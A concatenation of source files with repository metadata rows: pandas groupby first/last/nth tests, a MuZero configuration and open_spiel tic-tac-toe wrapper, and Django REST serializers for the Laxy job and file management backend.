def test_first_categorical_and_datetime_data_nat():
# GH 20520
df = DataFrame(
{
"group": ["first", "first", "second", "third", "third"],
"time": 5 * [np.datetime64("NaT")],
"categories": Series(["a", "b", "c", "a", "b"], dtype="category"),
}
)
result = df.groupby("group").first()
expected = DataFrame(
{
"time": 3 * [np.datetime64("NaT")],
"categories": Series(["a", "c", "a"]).astype(
pd.CategoricalDtype(["a", "b", "c"])
),
}
)
expected.index = Index(["first", "second", "third"], name="group")
tm.assert_frame_equal(result, expected)
def test_first_multi_key_groupbby_categorical():
# GH 22512
df = DataFrame(
{
"A": [1, 1, 1, 2, 2],
"B": [100, 100, 200, 100, 100],
"C": ["apple", "orange", "mango", "mango", "orange"],
"D": ["jupiter", "mercury", "mars", "venus", "venus"],
}
)
df = df.astype({"D": "category"})
result = df.groupby(by=["A", "B"]).first()
expected = DataFrame(
{
"C": ["apple", "mango", "mango"],
"D": Series(["jupiter", "mars", "venus"]).astype(
pd.CategoricalDtype(["jupiter", "mars", "mercury", "venus"])
),
}
)
expected.index = MultiIndex.from_tuples(
[(1, 100), (1, 200), (2, 100)], names=["A", "B"]
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("method", ["first", "last", "nth"])
def test_groupby_last_first_nth_with_none(method, nulls_fixture):
# GH29645
expected = Series(["y"])
data = Series(
[nulls_fixture, nulls_fixture, nulls_fixture, "y", nulls_fixture],
index=[0, 0, 0, 0, 0],
).groupby(level=0)
if method == "nth":
result = getattr(data, method)(3)
else:
result = getattr(data, method)()
tm.assert_series_equal(result, expected)
def test_groupby_nth_with_column_axis():
# GH43926
df = DataFrame(
[
[4, 5, 6],
[8, 8, 7],
],
index=["z", "y"],
columns=["C", "B", "A"],
)
result = df.groupby(df.iloc[1], axis=1).nth(0)
expected = DataFrame(
[
[6, 4],
[7, 8],
],
index=["z", "y"],
columns=[7, 8],
)
expected.columns.name = "y"
tm.assert_frame_equal(result, expected)
| 31.077869
| 87
| 0.527364
|
e603827ea9d27820295884c357c0cdceb0ff59d7
| 11,849
|
py
|
Python
|
games/spiel.py
|
Wu-Chenyang/PO-MuZero
|
c2b6f87c01a195d6f1cbe297e826974120bba3d3
|
[
"MIT"
] | null | null | null |
games/spiel.py
|
Wu-Chenyang/PO-MuZero
|
c2b6f87c01a195d6f1cbe297e826974120bba3d3
|
[
"MIT"
] | null | null | null |
games/spiel.py
|
Wu-Chenyang/PO-MuZero
|
c2b6f87c01a195d6f1cbe297e826974120bba3d3
|
[
"MIT"
] | null | null | null |
import datetime
import os
import numpy
import torch
from .abstract_game import AbstractGame
# This is a Game wrapper for open_spiel games. It allows you to run any game in the open_spiel library.
try:
import pyspiel
except ImportError:
import sys
sys.exit("You need to install open_spiel by running pip install open_spiel. For a full documentation, see: https://github.com/deepmind/open_spiel/blob/master/docs/install.md")
# The game you want to run. See https://github.com/deepmind/open_spiel/blob/master/docs/games.md for a list of games
game = pyspiel.load_game("tic_tac_toe")
class MuZeroConfig:
def __init__(self):
# More information is available here: https://github.com/werner-duvaud/muzero-general/wiki/Hyperparameter-Optimization
self.game = game
self.seed = 0 # Seed for numpy, torch and the game
        self.max_num_gpus = None  # Fix the maximum number of GPUs to use. It's usually faster to use a single GPU (set it to 1) if it has enough memory. None will use all available GPUs
### Game
self.observation_shape = tuple(self.game.observation_tensor_shape()) # Dimensions of the game observation, must be 3D (channel, height, width). For a 1D array, please reshape it to (1, 1, length of array)
self.action_space = list(range(self.game.policy_tensor_shape()[0])) # Fixed list of all possible actions. You should only edit the length
self.players = list(range(self.game.num_players())) # List of players. You should only edit the length
self.stacked_observations = 0 # Number of previous observations and previous actions to add to the current observation
self.simultaneous = False # The agents will execute actions simultaneously.
# Evaluate
self.muzero_player = 0 # Turn Muzero begins to play (0: MuZero plays first, 1: MuZero plays second)
self.opponent = "self" # Hard coded agent that MuZero faces to assess his progress in multiplayer games. It doesn't influence training. None, "random" or "expert" if implemented in the Game class
### Self-Play
self.num_workers = 1 # Number of simultaneous threads/workers self-playing to feed the replay buffer
self.selfplay_on_gpu = False
self.max_moves = self.game.max_game_length() # Maximum number of moves if game is not finished before
self.num_simulations = 25 # Number of future moves self-simulated
self.discount = 0.1 # Chronological discount of the reward
self.temperature_threshold = None # Number of moves before dropping the temperature given by visit_softmax_temperature_fn to 0 (ie selecting the best action). If None, visit_softmax_temperature_fn is used every time
# Root prior exploration noise
self.root_dirichlet_alpha = 0.1
self.root_exploration_fraction = 0.25
# UCB formula
self.pb_c_base = 19652
self.pb_c_init = 1.25
### Network
self.network = "resnet" # "resnet" / "fullyconnected"
self.support_size = 10 # Value and reward are scaled (with almost sqrt) and encoded on a vector with a range of -support_size to support_size. Choose it so that support_size <= sqrt(max(abs(discounted reward)))
# Residual Network
self.downsample = False # Downsample observations before representation network, False / "CNN" (lighter) / "resnet" (See paper appendix Network Architecture)
self.blocks = 2 # Number of blocks in the ResNet
self.channels = 16 # Number of channels in the ResNet
self.reduced_channels_reward = 16 # Number of channels in reward head
self.reduced_channels_value = 16 # Number of channels in value head
self.reduced_channels_policy = 16 # Number of channels in policy head
self.resnet_fc_reward_layers = [8] # Define the hidden layers in the reward head of the dynamic network
self.resnet_fc_value_layers = [8] # Define the hidden layers in the value head of the prediction network
self.resnet_fc_policy_layers = [8] # Define the hidden layers in the policy head of the prediction network
# Fully Connected Network
self.encoding_size = 32
self.fc_representation_layers = [] # Define the hidden layers in the representation network
self.fc_dynamics_layers = [16] # Define the hidden layers in the dynamics network
self.fc_reward_layers = [16] # Define the hidden layers in the reward network
self.fc_value_layers = [] # Define the hidden layers in the value network
self.fc_policy_layers = [] # Define the hidden layers in the policy network
### Training
self.results_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../results", os.path.basename(__file__)[:-3], datetime.datetime.now().strftime("%Y-%m-%d--%H-%M-%S")) # Path to store the model weights and TensorBoard logs
self.save_model = True # Save the checkpoint in results_path as model.checkpoint
self.training_steps = 1000000 # Total number of training steps (ie weights update according to a batch)
self.batch_size = 64 # Number of parts of games to train on at each training step
self.checkpoint_interval = 10 # Number of training steps before using the model for self-playing
self.logging_interval = int(1e1)
self.value_loss_weight = 0.25 # Scale the value loss to avoid overfitting of the value function, paper recommends 0.25 (See paper appendix Reanalyze)
self.train_on_gpu = torch.cuda.is_available() # Train on GPU if available
self.optimizer = "Adam" # "Adam" or "SGD". Paper uses SGD
self.weight_decay = 1e-4 # L2 weights regularization
self.momentum = 0.9 # Used only if optimizer is SGD
# Exponential learning rate schedule
self.lr_init = 0.003 # Initial learning rate
self.lr_decay_rate = 1 # Set it to 1 to use a constant learning rate
self.lr_decay_steps = 10000
### Replay Buffer
self.replay_buffer_size = 3000 # Number of self-play games to keep in the replay buffer
self.num_unroll_steps = 20 # Number of game moves to keep for every batch element
self.td_steps = 20 # Number of steps in the future to take into account for calculating the target value
self.PER = True # Prioritized Replay (See paper appendix Training), select in priority the elements in the replay buffer which are unexpected for the network
self.PER_alpha = 0.5 # How much prioritization is used, 0 corresponding to the uniform case, paper suggests 1
# Reanalyze (See paper appendix Reanalyse)
self.use_last_model_value = True # Use the last model to provide a fresher, stable n-step value (See paper appendix Reanalyze)
self.reanalyse_on_gpu = False
### Adjust the self play / training ratio to avoid over/underfitting
self.self_play_delay = 0 # Number of seconds to wait after each played game
self.training_delay = 0 # Number of seconds to wait after each training step
self.ratio = None # Desired training steps per self played step ratio. Equivalent to a synchronous version, training can take much longer. Set it to None to disable it
def visit_softmax_temperature_fn(self, trained_steps):
"""
Parameter to alter the visit count distribution to ensure that the action selection becomes greedier as training progresses.
The smaller it is, the more likely the best action (ie with the highest visit count) is chosen.
Returns:
Positive float.
"""
return 1
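        # A constant temperature of 1 keeps action selection proportional to the MCTS visit
        # counts for the whole run. A common alternative (illustrative only, not what this
        # config uses) is a step schedule that gets greedier with training, e.g.:
        #   if trained_steps < 0.5 * self.training_steps: return 1.0
        #   elif trained_steps < 0.75 * self.training_steps: return 0.5
        #   else: return 0.25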
class Game(AbstractGame):
"""
Game wrapper.
"""
def __init__(self, seed=None):
self.env = Spiel()
def step(self, action):
"""
Apply action to the game.
Args:
action : action of the action_space to take.
Returns:
The new observation, the reward and a boolean if the game has ended.
"""
observation, reward, done = self.env.step(action)
return observation, reward * 20, done
def to_play(self):
"""
Return the current player.
Returns:
The current player, it should be an element of the players list in the config.
"""
return self.env.to_play()
def legal_actions(self):
"""
        Should return the legal actions at each turn; if that is not available, it can return
        the whole action space. At each turn, the game has to be able to handle one of the returned actions.
        For complex games where calculating the legal moves is too slow, the idea is to define the legal actions
        as equal to the action space but to return a negative reward if the action is illegal.
Returns:
An array of integers, subset of the action space.
"""
return self.env.legal_actions()
def reset(self):
"""
Reset the game for a new game.
Returns:
Initial observation of the game.
"""
return self.env.reset()
def render(self):
"""
Display the game observation.
"""
self.env.render()
input("Press enter to take a step ")
def legal_actions_human(self):
return self.env.human_legal_actions()
def human_to_action(self):
"""
For multiplayer games, ask the user for a legal action
and return the corresponding action number.
Returns:
An integer from the action space.
"""
while True:
try:
print("Legal Actions: ", self.legal_actions_human())
choice = input("Enter your move: ")
if (choice in self.legal_actions_human()):
break
except:
pass
print("Wrong input, try again")
return self.env.board.string_to_action(choice)
def action_to_string(self, action_number):
"""
Convert an action number to a string representing the action.
Args:
action_number: an integer from the action space.
Returns:
String representing the action.
"""
row = action_number // 3 + 1
col = action_number % 3 + 1
return f"Play row {row}, column {col}"
class Spiel:
def __init__(self):
self.game = game
self.board = self.game.new_initial_state()
self.player = 1
def to_play(self):
return 0 if self.player == 1 else 1
def reset(self):
self.board = self.game.new_initial_state()
self.player = 1
return self.get_observation()
def step(self, action):
self.board = self.board.child(action)
done = self.board.is_terminal()
reward = 1 if self.have_winner() else 0
observation = self.get_observation()
self.player *= -1
return observation, reward, done
def get_observation(self):
if self.player == 1:
current_player = 1
else:
current_player = 0
return numpy.array(self.board.observation_tensor(current_player)).reshape(self.game.observation_tensor_shape())
def legal_actions(self):
return self.board.legal_actions()
def have_winner(self):
rewards = self.board.rewards()
if (self.player == 1):
if (rewards[0] == 1.0):
return True
elif (self.player == -1):
if (rewards[1] == 1.0):
return True
return False
def human_legal_actions(self):
return [self.board.action_to_string(x) for x in self.board.legal_actions()]
def render(self):
print(self.board)
| 40.302721
| 244
| 0.657693
|
469cf1e494198570402e1698fdafacc011861f9f
| 25,476
|
py
|
Python
|
laxy_backend/serializers.py
|
MonashBioinformaticsPlatform/laxy
|
fa9cfc3d9b2738ec0b9f471ddf4a4235cb6eb594
|
[
"Apache-2.0"
] | 1
|
2020-11-19T15:10:42.000Z
|
2020-11-19T15:10:42.000Z
|
laxy_backend/serializers.py
|
MonashBioinformaticsPlatform/laxy
|
fa9cfc3d9b2738ec0b9f471ddf4a4235cb6eb594
|
[
"Apache-2.0"
] | 177
|
2018-10-28T23:01:24.000Z
|
2022-02-26T06:35:29.000Z
|
laxy_backend/serializers.py
|
MonashBioinformaticsPlatform/laxy
|
fa9cfc3d9b2738ec0b9f471ddf4a4235cb6eb594
|
[
"Apache-2.0"
] | 2
|
2019-03-14T10:06:19.000Z
|
2020-08-24T19:41:28.000Z
|
import json
from collections import OrderedDict
from django.contrib.contenttypes.models import ContentType
from pathlib import Path
from urllib.parse import urlparse
import pydash
from django.db import transaction
from rest_framework import serializers
from django.core.validators import URLValidator
from rest_framework import status
from rest_framework.exceptions import ValidationError, PermissionDenied
from rest_framework.fields import CurrentUserDefault
from typing import Sequence
from drf_openapi.entities import VersionedSerializers
from http.client import responses as response_code_messages
from laxy_backend.models import SampleCart, PipelineRun, File, FileSet
from laxy_backend.util import unique, is_valid_laxy_sftp_url
from . import models
import logging
logger = logging.getLogger(__name__)
default_status_codes = (400, 401, 403, 404)
def status_codes(*codes):
if not codes:
codes = default_status_codes
return dict([(c, response_code_messages[c]) for c in codes])
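# e.g. status_codes(400, 404) -> {400: 'Bad Request', 404: 'Not Found'}; calling it with no
# arguments covers every code in default_status_codes above.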
# TODO: Swagger docs (drf_openapi) lists JSONField type as string.
# So we use this class to serialize arbitrary JSON instead.
# It appears as the correct field type in the docs.
# Maybe drf_openapi needs a fix ?
class SchemalessJsonResponseSerializer(serializers.Serializer):
"""
We use this serializer anywhere we want to accept a schemaless blob of JSON.
"""
def create(self, validated_data):
return validated_data
def update(self, instance, validated_data):
instance = validated_data
return instance
def to_internal_value(self, data):
if isinstance(data, str):
data = json.loads(data, object_pairs_hook=OrderedDict)
data = OrderedDict(data)
if json.loads(json.dumps(data), object_pairs_hook=OrderedDict) != data:
msg = "Invalid JSON, round-trip serialization failed"
raise ValidationError(msg)
return data
def to_representation(self, obj):
return obj
class BaseModelSerializer(serializers.ModelSerializer):
class Meta:
fields = "__all__"
read_only_fields = ("id",)
def uuid(self, obj):
if hasattr(obj, "uuid"):
return obj.uuid()
else:
return obj.id
def _set_owner(self, obj):
"""
Set the owner (User) of the model instance (`obj`), based
on the user making the request.
"""
if self.context:
user = self.context.get("request").user
if user and hasattr(obj, "owner"):
obj.owner = user
return obj
def create(self, validated_data):
obj = self.Meta.model.objects.create(**validated_data)
# If the request is provided as part of the context
# passed to the serializer, assign it as the owner
# of the model
obj = self._set_owner(obj)
obj.save()
return obj
def _update_attrs(self, instance, validated_data):
"""
Updates the non-readonly attributes on a model instance with
the given validated_data (dictionary) values.
:param instance: The model instance to update
:type instance: django.db.models.Model
:param validated_data: The new data that will replace attribute
values in instance.
:type validated_data: dict
:return: The updated model instance.
:rtype: django.db.models.Model
"""
for k, v in validated_data.items():
if k not in getattr(self.Meta, "read_only_fields", []):
setattr(instance, k, v)
return instance
class PatchSerializerResponse(serializers.Serializer):
"""
A generic PATCH response serializer, which should generally be 204 status
code on success with no response body. This primarily exists to present
the correct status codes in the drf_openapi Swagger docs.
"""
class Meta:
fields = ()
read_only_fields = ("id",)
error_status_codes = status_codes(*default_status_codes, 204)
class PutSerializerResponse(serializers.Serializer):
"""
A generic PUT response serializer, which should generally be 204 status
code on success with no response body. This primarily exists to present
the correct status codes in the drf_openapi Swagger docs.
"""
class Meta:
fields = ()
read_only_fields = ("id",)
error_status_codes = status_codes(*default_status_codes, 204)
class SystemStatusSerializer(BaseModelSerializer):
class Meta:
model = models.SystemStatus
fields = (
"status",
"message",
"long_message",
"link_url",
"start_time",
"end_time",
)
class PingResponseSerializer(serializers.Serializer):
system_status = SystemStatusSerializer(
required=False, read_only=True, allow_null=True
)
version = serializers.CharField(max_length=255, required=False)
env = serializers.CharField(max_length=255, required=False)
class FileSerializer(BaseModelSerializer):
name = serializers.CharField(max_length=255, required=False)
path = serializers.CharField(max_length=4096, required=False)
location = serializers.CharField(
max_length=2048, validators=[models.URIValidator()]
)
fileset = serializers.PrimaryKeyRelatedField(
queryset=FileSet.objects.all(), required=False
)
type_tags = serializers.ListField(default=[], required=False)
# metadata = serializers.JSONField()
metadata = SchemalessJsonResponseSerializer(
required=False
) # becomes OpenAPI 'object' type
class Meta:
model = models.File
fields = (
"id",
"owner",
"name",
"path",
"location",
"checksum",
"fileset",
"type_tags",
"deleted",
"metadata",
)
read_only_fields = (
"id",
"owner",
)
error_status_codes = status_codes()
def create(self, validated_data):
location = validated_data.get("location", None)
scheme = urlparse(location).scheme.lower()
if scheme == "laxy+sftp" and not is_valid_laxy_sftp_url(location):
raise ValidationError(
"Invalid laxy+ftp:// URL (does ComputeResource exist ?)"
)
f = models.File.objects.create(**validated_data)
f.save()
return f
@transaction.atomic
def update(self, instance, validated_data):
instance = self._update_attrs(instance, validated_data)
for field in getattr(self.Meta.model.ExtraMeta, "patchable_fields", []):
if hasattr(instance, field):
new_value = validated_data.get(field, getattr(instance, field))
setattr(instance, field, new_value)
instance.save()
return instance
class FileSerializerPostRequest(FileSerializer):
class Meta(FileSerializer.Meta):
fields = (
"name",
"path",
"location",
"checksum",
"fileset",
"type_tags",
"metadata",
)
class FileBulkRegisterSerializer(FileSerializer):
class Meta(FileSerializer.Meta):
fields = ("name", "path", "location", "checksum", "type_tags", "metadata")
def to_internal_value(self, data):
if isinstance(data.get("type_tags", ""), str):
data["type_tags"] = data["type_tags"].replace(" ", "").split(",")
if "filepath" in data:
data["name"] = Path(data["filepath"]).name
data["path"] = str(Path(data["filepath"]).parent)
del data["filepath"]
# Trim any whitespace from ends of values
for field in self.Meta.fields:
if field in data and isinstance(data[field], str):
data[field] = data[field].strip()
if field in data and isinstance(data[field], list):
data[field] = [item.strip() for item in data[field]]
return data
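        # Illustration (hypothetical payload): {"filepath": "run1/reads.fastq", "type_tags": "fastq, R1"}
        # is normalised to {"name": "reads.fastq", "path": "run1", "type_tags": ["fastq", "R1"]}
        # before field validation runs.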
# Only add type_tags, don't replace list
# def update(self, instance: File, validated_data):
# validated_data['type_tags'].extend(instance.type_tags)
# validated_data['type_tags'] = unique(validated_data['type_tags'])
# instance = self._update_attrs(instance, validated_data)
# instance.save()
# return instance
# naming is hard
class JobFileSerializerCreateRequest(FileSerializer):
location = serializers.CharField(
max_length=2048, validators=[models.URIValidator()], required=False
)
class Meta(FileSerializer.Meta):
fields = ("location", "checksum", "type_tags", "metadata")
class FileSetSerializer(BaseModelSerializer):
files = FileSerializer(many=True, required=False, allow_null=True)
# This lists only only IDs
# files = serializers.PrimaryKeyRelatedField(many=True,
# queryset=File.objects.all())
class Meta:
model = models.FileSet
fields = (
"id",
"name",
"path",
"owner",
"files",
)
read_only_fields = (
"id",
"owner",
)
depth = 0
error_status_codes = status_codes()
class FileSerializerOptionalLocation(FileSerializer):
"""
Allows the `location` field to be omitted - intended to be
used when we want to be able to refer to a list of new files
where location would be required, or a list of existing files
using `id` only.
"""
id = serializers.CharField(max_length=24, required=False)
location = serializers.CharField(
required=False,
allow_null=False,
allow_blank=False,
max_length=2048,
validators=[models.URIValidator()],
)
class FileSetSerializerPostRequest(FileSetSerializer):
class Meta(FileSetSerializer.Meta):
fields = (
"id",
"name",
"path",
"files",
)
files = FileSerializerOptionalLocation(many=True, required=False, allow_null=True)
@transaction.atomic
def create(self, validated_data):
"""
:param validated_data:
:type validated_data:
:return:
:rtype:
"""
files_data = validated_data.pop("files", [])
fset = models.FileSet.objects.create(**validated_data)
fset = self._set_owner(fset)
# We create new file objects if the `files` list has details other than
# the id set. If only the id is set, we assume it's an existing file
# and use that.
for f in files_data:
f_id = f.get("id", None)
if not f_id:
fobj = models.File.objects.create(**f)
fobj.owner = fset.owner
else:
try:
fobj = models.File.objects.get(id=f_id)
except File.DoesNotExist:
raise File.DoesNotExist(f"File {f_id} does not exist.")
if fobj.owner != fset.owner:
raise PermissionDenied(
detail="Attempt to add Files not owned by the FileSet owner disallowed."
)
fset.add(fobj)
return fset
class SampleCartSerializer(BaseModelSerializer):
# samples = serializers.JSONField(required=True)
# samples = SchemalessJsonResponseSerializer(required=True)
samples = serializers.ListField(required=True)
class Meta:
model = models.SampleCart
fields = ("id", "name", "owner", "samples")
read_only_fields = (
"id",
"owner",
)
error_status_codes = status_codes()
class ComputeResourceSerializer(BaseModelSerializer):
gateway_server = serializers.CharField(required=False, max_length=255)
class Meta:
model = models.ComputeResource
fields = "__all__"
# not actually required for id since editable=False on model
read_only_fields = ("id",)
depth = 1
error_status_codes = status_codes()
class PipelineSerializer(BaseModelSerializer):
metadata = SchemalessJsonResponseSerializer(required=False)
class Meta:
model = models.Pipeline
fields = "__all__"
depth = 0
error_status_codes = status_codes()
class JobSerializerBase(BaseModelSerializer):
owner = serializers.PrimaryKeyRelatedField(
read_only=True, default=serializers.CurrentUserDefault()
)
input_fileset_id = serializers.CharField(
source="input_files",
required=False,
allow_blank=True,
allow_null=True,
max_length=24,
)
output_fileset_id = serializers.CharField(
source="output_files",
required=False,
allow_blank=True,
allow_null=True,
max_length=24,
)
# params = serializers.JSONField(required=False)
params = SchemalessJsonResponseSerializer(
required=False
) # becomes OpenAPI 'object' type
metadata = SchemalessJsonResponseSerializer(required=False)
compute_resource = serializers.CharField(
source="compute_resource.id",
required=False,
allow_blank=True,
allow_null=True,
max_length=24,
)
class Meta:
model = models.Job
fields = "__all__"
# not actually required for id since editable=False on model
read_only_fields = ("id",)
depth = 0
error_status_codes = status_codes()
class JobSerializerResponse(JobSerializerBase):
input_fileset_id = serializers.CharField(
source="input_files.id", max_length=24, default=""
)
output_fileset_id = serializers.CharField(
source="output_files.id", max_length=24, default=""
)
# output_files = FileSerializer(many=True, required=False)
class Meta:
model = models.Job
exclude = (
"input_files",
"output_files",
)
depth = 0
error_status_codes = status_codes()
@transaction.atomic
def update(self, instance, validated_data):
instance = self._update_attrs(instance, validated_data)
for field in getattr(self.Meta.model.ExtraMeta, "patchable_fields", []):
if hasattr(instance, field):
new_value = validated_data.get(field, getattr(instance, field))
setattr(instance, field, new_value)
instance.save()
return instance
# TODO: modify this to trim down unnecessary output,
# eg, we don't need the full nested sample_cart etc
class JobListSerializerResponse(JobSerializerResponse):
latest_event = serializers.CharField(source="latest_event.event", default="")
class Meta:
model = models.Job
exclude = ("input_files", "output_files")
depth = 0
error_status_codes = status_codes()
class JobSerializerRequest(JobSerializerBase):
input_files = FileSerializer(many=True, required=False)
class Meta(JobSerializerBase.Meta):
depth = 1
@transaction.atomic
def create(self, validated_data):
"""
:param validated_data:
:type validated_data:
:return:
:rtype:
"""
input_files_data = validated_data.pop("input_files", [])
input_fileset_id = validated_data.pop("input_fileset_id", None)
# Output files can only be updated in a PATCH operation
# output_files_data = validated_data.pop('output_files', [])
compute_resource_id = validated_data.pop("compute_resource", None)
job = models.Job.objects.create(**validated_data)
job = self._set_owner(job)
if compute_resource_id:
compute = models.ComputeResource.objects.get(id=compute_resource_id)
job.compute_resource = compute
# We create new file objects if the input file in the list has
# details other than the id set. If only the id is set, we assume
# it's an existing file and use that. If an input_fileset id is provided
# we ignore anything in input_files and just use the specified FileSet.
if not input_fileset_id:
ifileset = job.input_files
if not ifileset:
ifileset = models.FileSet.objects.create(name="input", owner=job.owner)
ifileset.name = f"Input files for job: {job.id}"
for f in input_files_data:
f_id = f.get("id", None)
if not f_id:
input_file = models.File.objects.create(**f)
else:
input_file = models.File.objects.get(id=f_id)
ifileset.add(input_file)
ifileset.save()
else:
if input_files_data:
raise serializers.ValidationError(
"You should only specify an "
"input_fileset ID or a list "
"of input_files, not both."
)
ifileset = models.FileSet.objects.get(id=input_fileset_id)
job.input_files = ifileset
if not job.output_files:
job.output_files = models.FileSet.objects.create(
name=f"Output files for job: {job.id}", owner=job.owner
)
job.output_files.save()
job.save()
return job
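    # Illustrative sketch only - the ids and values below are invented. create()
    # accepts either a reference to an existing FileSet or an inline list of
    # input files, but not both:
    #
    #   job_payload = {
    #       "params": {"genome": "hg38"},
    #       "input_fileset_id": "someExistingFileSetId",   # EITHER this ...
    #       # "input_files": [{"id": "someFileId"}],       # ... OR this, not both
    #   }
    #   serializer = JobSerializerRequest(data=job_payload, context={"request": request})
    #   serializer.is_valid(raise_exception=True)
    #   job = serializer.save()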
@transaction.atomic
def update(self, instance, validated_data):
        output_files_data = validated_data.pop("output_files", [])
        # status = validated_data.get('status', instance.status)
        ofiles = []
        for data in output_files_data:
            # We can add files by id if they exist, or create new files
            # from file objects (if id is left unset).
            file_id = data.get("id", None)
            if file_id is None:
                data.pop("id", None)
                new_file = models.File.objects.create(**data)
                ofiles.append(new_file)
            else:
                # Look the File up by id so a non-existent id fails loudly rather
                # than silently attaching a dangling reference.
                existing_file = models.File.objects.get(id=file_id)
                ofiles.append(existing_file)
        instance.output_files.add(ofiles)
        # instance.save() isn't required here - instance.output_files.add() saves
        # Apply any remaining validated fields directly to the instance, mirroring
        # the other update() implementations in this module.
        instance = self._update_attrs(instance, validated_data)
        instance.save()
        return instance
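# Illustrative sketch only - file details are invented, and the exact request
# field name depends on the declared serializer fields. It mirrors what update()
# above pops from validated_data: output files can be attached on PATCH, either
# existing ones by id or new File records inline:
#
#   patch_payload = {
#       "output_files": [
#           {"id": "someExistingFileId"},
#           {"name": "counts.txt", "location": "s3://bucket/counts.txt"},
#       ],
#   }
#   serializer = JobSerializerRequest(job, data=patch_payload, partial=True,
#                                     context={"request": request})
#   serializer.is_valid(raise_exception=True)
#   job = serializer.save()  # dispatches to update() above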
class PipelineRunSerializer(BaseModelSerializer):
owner = serializers.PrimaryKeyRelatedField(
read_only=True,
# default=serializers.CurrentUserDefault()
)
# job = serializers.PrimaryKeyRelatedField()
sample_cart = SampleCartSerializer()
# sample_metadata = SchemalessJsonResponseSerializer(required=False) # becomes OpenAPI 'object' type
params = SchemalessJsonResponseSerializer(
required=False
) # becomes OpenAPI 'object' type
class Meta:
model = models.PipelineRun
fields = "__all__"
read_only_fields = (
"id",
"owner",
)
depth = 1
error_status_codes = status_codes()
# TODO: Should we convert File UUIDs from the associated SampleCart into URLs here ?
class PipelineRunCreateSerializer(PipelineRunSerializer):
sample_cart = serializers.PrimaryKeyRelatedField(queryset=SampleCart.objects.all())
# input_fileset = serializers.PrimaryKeyRelatedField(queryset=FileSet.objects.all())
class Meta(PipelineRunSerializer.Meta):
depth = 0
def create(self, validated_data):
run = models.PipelineRun.objects.create(**validated_data)
self._set_owner(run)
run.save()
return run
def update(self, instance, validated_data):
# FIXME: This is not the right way to update the instance - we really should be
# doing it via the serializer (as commented out below).
# for k, v in validated_data.items():
# if k not in self.Meta.read_only_fields:
# setattr(instance, k, v)
instance = self._update_attrs(instance, validated_data)
instance.save()
return instance
# FIXME: This fails due to not validating the sample_cart primary key.
        # Unclear why PrimaryKeyRelatedField isn't doing its job
# serializer = PipelineRunCreateSerializer(instance,
# data=validated_data)
# if serializer.is_valid():
# return serializer.save()
class EventLogSerializer(BaseModelSerializer):
extra = SchemalessJsonResponseSerializer(required=False)
class Meta:
model = models.EventLog
fields = "__all__"
read_only_fields = (
"id",
"user",
)
depth = 0
error_status_codes = status_codes()
def create(self, validated_data):
obj = self.Meta.model.objects.create(**validated_data)
obj.user = self.context.get("request").user
obj.save()
return obj
class JobEventLogSerializer(EventLogSerializer):
class Meta:
model = models.EventLog
exclude = (
"user",
"timestamp",
"object_id",
"content_type",
)
read_only_fields = (
"id",
"user",
)
depth = 0
error_status_codes = status_codes()
class FileListingItem(serializers.Serializer):
name = serializers.CharField(required=True)
location = serializers.URLField(required=True)
type = serializers.CharField(required=True)
tags = serializers.ListField(default=[])
class FileListing(serializers.Serializer):
listing = FileListingItem(many=True)
class LoginRequestSerializer(serializers.Serializer):
username = serializers.CharField(required=True)
password = serializers.CharField(required=True)
class RedirectResponseSerializer(serializers.Serializer):
redirect = serializers.URLField(required=True)
status = serializers.IntegerField(required=True)
class SocialAuthLoginRequest(serializers.Serializer):
provider = serializers.CharField(required=True)
code = serializers.CharField(required=True)
clientId = serializers.CharField(required=True)
redirectUri = serializers.URLField(required=True)
class SocialAuthLoginResponse(serializers.Serializer):
id = serializers.CharField(required=True)
username = serializers.CharField(required=True)
first_name = serializers.CharField()
last_name = serializers.CharField()
email = serializers.CharField()
class UserProfileResponse(serializers.Serializer):
id = serializers.CharField(required=True)
username = serializers.CharField(required=True)
full_name = serializers.CharField()
email = serializers.CharField()
profile_pic = serializers.URLField()
# TODO: Determine if these tokens are used anywhere by clients (eg frontend / run_job.sh)
# and if not remove them from here. Out of scope for user profile and a potential
# security issue
token = serializers.CharField()
drf_token = serializers.CharField()
jwt_authorization_header_prefix = serializers.CharField()
drf_authorization_header_prefix = serializers.CharField()
class AccessTokenSerializer(BaseModelSerializer):
content_type = serializers.CharField(required=True)
object_id = serializers.CharField(required=True)
class Meta:
model = models.AccessToken
fields = "__all__"
read_only_fields = ("id", "created_by", "token")
depth = 0
error_status_codes = status_codes()
def create(self, validated_data):
target_id = validated_data["object_id"]
target_content_type = validated_data["content_type"]
target_obj = ContentType.objects.get(
app_label="laxy_backend", model=target_content_type
).get_object_for_this_type(id=target_id)
del validated_data["content_type"]
del validated_data["object_id"]
obj = self.Meta.model.objects.create(**validated_data)
obj.created_by = getattr(self.context.get("request"), "user", None)
obj.obj = target_obj
obj.save()
return obj
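# Illustrative sketch only - the object id is invented and the content_type value
# is assumed to be the lowercase model name (e.g. "job"). create() above resolves
# the target through Django's ContentType framework, so the request names a model
# and a primary key rather than a hard-coded relation:
#
#   data = {"content_type": "job", "object_id": "someJobId"}
#   serializer = AccessTokenSerializer(data=data, context={"request": request})
#   serializer.is_valid(raise_exception=True)
#   token = serializer.save()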
class JobAccessTokenRequestSerializer(AccessTokenSerializer):
class Meta(AccessTokenSerializer.Meta):
fields = (
"id",
"object_id",
"content_type",
"token",
"created_by",
"expiry_time",
"created_time",
"modified_time",
)
read_only_fields = (
"id",
"created_by",
"token",
)
object_id = serializers.CharField(required=False)
content_type = serializers.CharField(required=False)
class JobAccessTokenResponseSerializer(JobAccessTokenRequestSerializer):
class Meta(JobAccessTokenRequestSerializer.Meta):
fields = (
"id",
"object_id",
"token",
"created_by",
"expiry_time",
"created_time",
"modified_time",
)
        read_only_fields = (
            "id",
            "object_id",
            "created_by",
            "token",
            "content_type",
        )
| 31.805243 | 105 | 0.627532 |
